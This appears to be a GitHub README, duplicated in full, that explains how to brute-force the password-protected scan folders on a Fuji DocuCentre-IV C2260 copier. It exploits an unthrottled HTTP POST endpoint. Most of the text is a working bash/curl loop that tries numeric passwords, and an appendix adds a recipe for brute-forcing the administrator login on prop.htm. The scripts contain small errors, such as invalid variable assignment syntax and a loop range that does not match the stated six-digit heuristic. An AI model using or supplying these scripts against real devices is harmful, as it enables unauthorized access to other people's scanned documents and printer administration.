syncom/fuji-docucentre-iv_c226-password-bruteforcing

## fuji-docucentre-iv_c226-password-bruteforcing
This instruction describes how to brute force the "Scan" folder's password on a Fuji DocuCentre-IV C2260 Version
1.8 printer/xerox copier.

The DocuCentre-IV C2260 runs a web server at port 80. Because the HTTP interface is not secured, one could also
mount a man-in-the-middle (MITM) attack. However, doing a MITM attack is not what we are discussing here. The
web application at port 80 has an interface (in UI, under the Scan>Folder menu) to which mutiple users deliver
their scanned documents. These folders are password protected. It turns out getting access to such a folder can
be done through a simple HTTP POST command. And this command is not throttled upon access failure. Therefore, it
allows us to automate the authentication process and thus brute force the password.

Suppose the IP address of the web server is 192.168.1.42.

Suppose we want to brute force the folder with a folder number '005' in the web UI.

Because it requires a user to manually enter the password from the printer's keyboards when a document is scanned
into it, we further use the heuristic that the password is a short (less than or equal to 6 digits) number.

Here is the code to do so, from under a Linux bash shell.

# Start of code
function trypass {
    mypass=$1
    myfolder=$2
    machineip=$3
    # Here the '-m 10' option sets the default timeout to 10 sec
    mycode=$(curl -m 10 -s -o /dev/null -w "%{http_code}\\n" \
           -d "PWD=${mypass}&SET=1&BOX=${myfolder}&ORD=DD" \
           -H "Content-Type: application/x-www-form-urlencoded" \
           -X POST http://${machineip}/PBPWD.cmd)
    echo ${mycode}
}

MYIP=192.168.1.42

for i in `seq 99999`;
do
    mycode=$(trypass $i 5 $MYIP)
    while [  $mycode -eq 000 ]
    # Retry
    do
        sleep 10
        mycode=$(trypass $i 5 $MYIP)
    done
    echo "$i: $mycode"
    if [ $mycode -eq 200 ]
    then break
    fi
done > folder_5.txt
# End of code

Inspect the content of folder_5.txt for the last entry/row. If password brute forcing succeeds, the last entry will
be of the form "<password>: 200".

Appendix:
Here is a recipe for brute forcing the administrator login through the 'prop.htm' interface.

# Start of code (bash script)
$mylogin="username:password"
$mybasicauth=$(echo -n ${mylogin} | openssl base64)
curl -s -o /dev/null -w "%{http_code}\\n" -X GET http://192.168.1.188/prop.htm -H "Authorization: Basic $mybasicauth"
# End of code

The above script returns the HTTP status code (200 on success; 401 on failure).
	This instruction describes how to brute force the "Scan" folder's password on a Fuji DocuCentre-IV C2260 Version
	1.8 printer/xerox copier.

	The DocuCentre-IV C2260 runs a web server at port 80. Because the HTTP interface is not secured, one could also
	mount a man-in-the-middle (MITM) attack. However, doing a MITM attack is not what we are discussing here. The
	web application at port 80 has an interface (in UI, under the Scan>Folder menu) to which mutiple users deliver
	their scanned documents. These folders are password protected. It turns out getting access to such a folder can
	be done through a simple HTTP POST command. And this command is not throttled upon access failure. Therefore, it
	allows us to automate the authentication process and thus brute force the password.

	Suppose the IP address of the web server is 192.168.1.42.

	Suppose we want to brute force the folder with a folder number '005' in the web UI.

	Because it requires a user to manually enter the password from the printer's keyboards when a document is scanned
	into it, we further use the heuristic that the password is a short (less than or equal to 6 digits) number.

	Here is the code to do so, from under a Linux bash shell.

	# Start of code
	function trypass {
	mypass=$1
	myfolder=$2
	machineip=$3
	# Here the '-m 10' option sets the default timeout to 10 sec
	mycode=$(curl -m 10 -s -o /dev/null -w "%{http_code}\\n" \
	-d "PWD=${mypass}&SET=1&BOX=${myfolder}&ORD=DD" \
	-H "Content-Type: application/x-www-form-urlencoded" \
	-X POST http://${machineip}/PBPWD.cmd)
	echo ${mycode}
	}

	MYIP=192.168.1.42

	for i in `seq 99999`;
	do
	mycode=$(trypass $i 5 $MYIP)
	while [ $mycode -eq 000 ]
	# Retry
	do
	sleep 10
	mycode=$(trypass $i 5 $MYIP)
	done
	echo "$i: $mycode"
	if [ $mycode -eq 200 ]
	then break
	fi
	done > folder_5.txt
	# End of code

	Inspect the content of folder_5.txt for the last entry/row. If password brute forcing succeeds, the last entry will
	be of the form "<password>: 200".

	Appendix:
	Here is a recipe for brute forcing the administrator login through the 'prop.htm' interface.

	# Start of code (bash script)
	$mylogin="username:password"
	$mybasicauth=$(echo -n ${mylogin} \| openssl base64)
	curl -s -o /dev/null -w "%{http_code}\\n" -X GET http://192.168.1.188/prop.htm -H "Authorization: Basic $mybasicauth"
	# End of code

	The above script returns the HTTP status code (200 on success; 401 on failure).